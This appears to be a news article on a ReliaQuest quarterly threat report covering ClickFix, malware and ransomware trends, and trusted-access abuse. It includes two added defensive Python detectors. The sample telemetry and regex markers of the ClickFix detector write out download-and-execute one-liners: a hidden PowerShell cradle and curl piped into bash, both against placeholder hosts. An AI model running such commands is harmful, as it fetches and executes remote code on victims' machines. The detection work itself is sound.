ReliaQuest has published quarterly research showing that cyber attackers are increasingly achieving their aims by abusing trusted identities, devices and tools rather than relying on malicious code. The analysis covers activity observed between March and May.
The findings suggest a continued shift in attacker tradecraft, with social engineering and the exploitation of unpatched internet-facing systems emerging as the two main routes into organisations. This is the third consecutive reporting period in which those patterns have held, even as the malware families and ransomware brands involved have changed.
At the centre of the report is ClickFix, which emerged as the dominant delivery technique during the quarter. The method uses social engineering to persuade users to paste attacker-supplied commands into trusted system tools, allowing attackers to bypass conventional file-scanning and perimeter defences.
ClickFix accounted for 14.9% of initial access activity in the incidents examined and nearly 28% of defence-evasion activity. The technique has moved beyond its earlier status as an emerging threat and should now be treated as a regular feature of the threat landscape.
Researchers also observed ClickFix reach macOS for the first time. In one example highlighted in the study, attackers used an AppleScript link to open Script Editor on Apple devices and run malicious commands there, extending a delivery method already widely seen on Windows systems.
That shift matters because many organisations still monitor Apple devices less closely than Windows estates. Moving to macOS did not change the underlying objective: stealing browser credentials, session cookies, crypto wallets and keychain data.
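The detection angle that follows from this is not the pasted payload itself but the launch pattern: an interactive "paste box" parent (the Windows Run dialog and Explorer address bar both spawn their children under explorer.exe; on macOS the report's example runs out of Script Editor) starting a script host or fetch tool with a download-and-execute command line. The following is an added example written for this page, not code from ReliaQuest or from any vendor. The event records are constructed, the field names only loosely mirror Sysmon Event ID 1 and EDR process telemetry, and the parent-process and marker lists are this example's assumptions, not figures from the report. It requires two independent signals (suspicious parent/child pairing plus a fetch-and-run marker) so that a user typing `cmd /c ipconfig` into Run does not fire:

```python
"""Flag ClickFix-style launches in process-creation telemetry (added example).

Records, field names and indicator lists below are constructed for illustration;
they are not a vendor schema and not taken from the ReliaQuest report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    os: str            # "windows" or "macos"
    parent_image: str  # full path of the parent process
    image: str         # full path of the new process
    command_line: str


# Interactive "paste box" parents (assumption of this example): the Run dialog and
# Explorer address bar spawn under explorer.exe; Script Editor on macOS.
PASTE_PARENTS = {
    "windows": {"explorer.exe"},
    "macos": {"script editor"},
}

# Script hosts and fetch tools a pasted one-liner typically invokes (assumption).
SCRIPT_HOSTS = {
    "windows": {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "curl.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe"},
    "macos": {"osascript", "sh", "bash", "zsh", "curl"},
}

# Fetch-and-run markers: remote URL, encoded or hidden PowerShell, download
# cradles, AppleScript shelling out, and curl piped straight into a shell.
MARKERS = [
    re.compile(r"https?://", re.I),
    re.compile(r"-(?:enc|encodedcommand|e)\b", re.I),
    re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"do shell script", re.I),
    re.compile(r"curl\s+.*\|\s*(?:sh|bash|zsh)\b", re.I),
]


def basename(path: str) -> str:
    """Lower-cased final path component, accepting Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def clickfix_indicators(ev: ProcEvent) -> list[str]:
    """Reasons an event looks like a pasted ClickFix command; empty list if none.

    All three conditions must hold: paste-box parent, script-host child, and at
    least one fetch-and-run marker on the command line.
    """
    parent = basename(ev.parent_image)
    child = basename(ev.image)
    if parent not in PASTE_PARENTS.get(ev.os, set()):
        return []
    if child not in SCRIPT_HOSTS.get(ev.os, set()):
        return []
    hits = [m.pattern for m in MARKERS if m.search(ev.command_line)]
    if not hits:
        return []
    return [f"parent={parent}", f"child={child}"] + [f"marker={h}" for h in hits]


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (host, reasons) for every event that trips the indicators."""
    out = []
    for ev in events:
        reasons = clickfix_indicators(ev)
        if reasons:
            out.append((ev.host, reasons))
    return out


# Constructed sample telemetry (hostnames and .invalid domains are made up).
SAMPLE_EVENTS = [
    ProcEvent("WS-114", "windows", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (iwr http://cdn.example.invalid/fix.txt)"'),
    ProcEvent("WS-114", "windows", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    ProcEvent("WS-115", "windows", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -EncodedCommand SQBFAFgA..."),   # scheduled task, not pasted
    ProcEvent("WS-116", "windows", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd /c ipconfig /all"),  # benign Run use
    ProcEvent("MBP-07", "macos",
              "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
              "/bin/sh", "sh -c curl -fsSL http://fix.example.invalid/p.sh | bash"),
    ProcEvent("MBP-08", "macos",
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
              "/usr/bin/curl", "curl -fsSL http://pkg.example.invalid/tool.tgz"),  # user in Terminal
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_EVENTS):
        print(host, ", ".join(reasons))
```

Only the explorer.exe-launched PowerShell cradle and the Script Editor-spawned shell are flagged; the scheduled-task PowerShell, the Terminal download and the benign Run-dialog `ipconfig` are not. The parent-process test is what gives this rule its value over a plain command-line grep, because it encodes the "user pasted this" step that defines ClickFix.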
Malware churn
The malware rankings changed sharply during the quarter. Last period’s leading families, BaoLoader, Shai-Hulud and RemcosRAT, all dropped out of the top three. They were replaced by Gamarue, NetSupport RAT and Raspberry Robin.
The pace of turnover suggests defenders can no longer rely on name-based tracking to understand attacker behaviour. Instead, security teams should focus on recurring methods such as abuse of legitimate remote tools and the spread of malware through removable media.
Two of the top three malware families identified during the period spread through USB devices or other removable media. That finding reinforces a pattern ReliaQuest has previously described as “seasonal USB”, in which infections linked to removable media rise during predictable periods such as US tax season and first-quarter financial reporting.
With removable media once again appearing among the top initial access techniques, the pattern now appears persistent rather than temporary. The report identified Gamarue as an older modular worm that spreads through malicious shortcut files and autorun entries, while Raspberry Robin was described as another worm used to broker access for ransomware operators.
Ransomware trends
In ransomware, Qilin was the most active group in the quarter, claiming 700 victims and remaining ahead of The Gentlemen, DragonForce, Akira and Inc Ransom. More significant, however, was the growing convergence of methods among the leading extortion groups.
Rather than relying on distinct techniques, the top operators were found to be using a similar playbook: exploiting unpatched edge devices, using Cloudflared tunnels for command and control, and staging and launching the encryptor over Server Message Block from a single compromised host. That common approach mattered more than which group name happened to top a leak site.
Lateral movement data underlined the point. Server Message Block and Windows Admin Shares overtook Remote Desktop Protocol as the leading lateral movement method, with SMB activity rising to 36% from a previous baseline of about 12%.
In many cases, encryption was launched from a single trusted host, leaving limited suspicious activity on the victim machines themselves. That shifts detection away from malicious files on endpoints and towards unusual network and identity behaviour, such as bulk SMB writes to administrative shares from machines that do not usually perform management tasks.
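One way to turn that into a detection, as an added example written for this page and not code from ReliaQuest: on Windows, file writes over SMB to administrative shares are recorded by the target host as Security Event ID 5145 (which requires the "Audit Detailed File Share" subcategory to be enabled) with the client address in Source Address and an access mask whose 0x2 bit is WriteData/AddFile. Collecting those events centrally lets you count how many distinct machines a single client wrote to within a short window, and suppress clients that legitimately perform management tasks. The records below are constructed, the baseline of management sources and the thresholds are this example's assumptions, and the field names are a simplification of the 5145 schema:

```python
"""Detect one host writing to admin shares on many machines (added example).

Input mirrors Windows Security Event ID 5145 (Detailed File Share) fields in a
simplified form; records, baseline and thresholds are constructed assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ShareAccess:
    ts: int            # epoch seconds of the event
    target_host: str   # computer that logged the event (the share's owner)
    src_ip: str        # 5145 "Source Address": the SMB client
    account: str       # 5145 "Account Name"
    share: str         # 5145 "Share Name", e.g. \\*\ADMIN$
    rel_target: str    # 5145 "Relative Target Name"
    access_mask: int   # 5145 "Access Mask"; 0x2 = WriteData / AddFile


WRITE_DATA = 0x2

# Hosts that are expected to push files to admin shares (jump host, deployment
# server). Assumed for this example; in practice derive it from a learned baseline.
MGMT_SOURCES = frozenset({"10.0.0.5"})


def is_admin_share(share: str) -> bool:
    """True for ADMIN$ and hidden drive shares such as C$ or D$ (IPC$ excluded)."""
    name = share.rstrip("\\").rsplit("\\", 1)[-1].upper()
    if name == "ADMIN$":
        return True
    return len(name) == 2 and name[1] == "$" and name[0].isalpha()


def find_bulk_admin_share_writes(events, window=300, min_targets=3,
                                 baseline=MGMT_SOURCES):
    """Return one alert per non-baseline client that wrote to admin shares on
    at least `min_targets` distinct hosts within `window` seconds."""
    writes = defaultdict(list)  # src_ip -> [(ts, target_host, rel_target)]
    for e in events:
        if e.src_ip in baseline:
            continue
        if not is_admin_share(e.share):
            continue
        if not e.access_mask & WRITE_DATA:
            continue
        writes[e.src_ip].append((e.ts, e.target_host, e.rel_target))

    alerts = []
    for src, w in writes.items():
        w.sort()
        for t0, _, _ in w:                       # slide a window from each write
            in_win = [x for x in w if t0 <= x[0] < t0 + window]
            targets = {x[1] for x in in_win}
            if len(targets) >= min_targets:
                alerts.append({
                    "src_ip": src,
                    "first_seen": t0,
                    "targets": sorted(targets),
                    "files": sorted({x[2] for x in in_win}),
                })
                break                            # one alert per source is enough
    return alerts


# Constructed sample events: a staging host drops the same binary on four
# machines in 90 seconds; the jump host does a deployment; a user reads files.
SAMPLE_EVENTS = [
    ShareAccess(1000, "ws01", "10.0.5.77", r"CORP\svc_backup", r"\\*\ADMIN$", "locker.exe", 0x2),
    ShareAccess(1030, "ws02", "10.0.5.77", r"CORP\svc_backup", r"\\*\ADMIN$", "locker.exe", 0x2),
    ShareAccess(1055, "ws03", "10.0.5.77", r"CORP\svc_backup", r"\\*\ADMIN$", "locker.exe", 0x2),
    ShareAccess(1090, "fs01", "10.0.5.77", r"CORP\svc_backup", r"\\*\C$", r"Windows\locker.exe", 0x2),
    ShareAccess(1100, "ws01", "10.0.0.5", r"CORP\svc_deploy", r"\\*\ADMIN$", "ccmsetup.exe", 0x2),
    ShareAccess(1110, "ws02", "10.0.0.5", r"CORP\svc_deploy", r"\\*\ADMIN$", "ccmsetup.exe", 0x2),
    ShareAccess(1120, "ws03", "10.0.0.5", r"CORP\svc_deploy", r"\\*\ADMIN$", "ccmsetup.exe", 0x2),
    ShareAccess(1200, "ws01", "10.0.9.12", r"CORP\bob", r"\\*\Finance", "q2.xlsx", 0x2),
    ShareAccess(1210, "ws02", "10.0.9.12", r"CORP\bob", r"\\*\C$", r"Users\bob\report.docx", 0x1),
    ShareAccess(1220, "ws04", "10.0.9.12", r"CORP\bob", r"\\*\C$", r"Users\bob\notes.txt", 0x2),
]

if __name__ == "__main__":
    for a in find_bulk_admin_share_writes(SAMPLE_EVENTS):
        print(a["src_ip"], "->", ", ".join(a["targets"]), a["files"])
```

Only 10.0.5.77 is reported: the deployment from the baselined jump host is suppressed, the write to the ordinary Finance share is out of scope, the C$ read carries no WriteData bit, and a single C$ write to one machine stays under the threshold. Because the events are collected from the targets rather than from the attacker's launch host, this logic still works in the single-trusted-host scenario the report describes, where the launching machine itself may show nothing abnormal.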
Trusted access
Across initial access, defence evasion and lateral movement, the report identified a common thread: attackers using channels organisations already trust. Spearphishing became the top initial access technique as campaigns shifted from compromised websites to emailed lures, while domain account abuse remained a major path into enterprise systems.
In defence evasion, masquerading through legitimate-looking names and locations was one of the leading techniques. Attackers are increasingly disguising tools, files and processes as ordinary software, making conventional known-bad file lists less useful than behavioural monitoring.
ReliaQuest also said artificial intelligence is helping attackers make familiar social-engineering methods faster, cheaper and more convincing rather than creating wholly new tactics. It pointed to one ClickFix loader that used likely AI-generated obfuscation to hide its real logic beneath large volumes of meaningless code.
Sector analysis showed named victim counts falling across most industries for a fourth straight period, although professional, scientific and technical services remained the most targeted sector. That decline should not be read as a reduction in risk, because the market appears to be consolidating around fewer but more disciplined and more damaging operators.
“Attackers are reaching their goals by abusing trust, not breaking it,” ReliaQuest said.
